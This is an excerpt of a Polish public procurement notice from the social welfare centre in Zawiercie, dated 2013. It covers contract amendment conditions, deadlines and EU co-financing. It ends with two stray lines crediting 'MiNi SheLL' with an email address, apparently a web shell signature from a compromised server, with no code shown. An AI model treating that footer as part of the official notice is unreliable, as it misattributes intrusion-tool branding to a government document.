<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w przypadku, gdy: a) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT,
b) przekształcenia podmiotowego Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mopszawiercie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w
Zawierciu, ul. Piłsudskiego 47, Pokój nr 6 - sekretariat, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Zawierciu, ul. Piłsudskiego 47, Pokój nr 6 - sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 08 stycznia 2013 r.
Projekt Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowany w ramach Działania 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com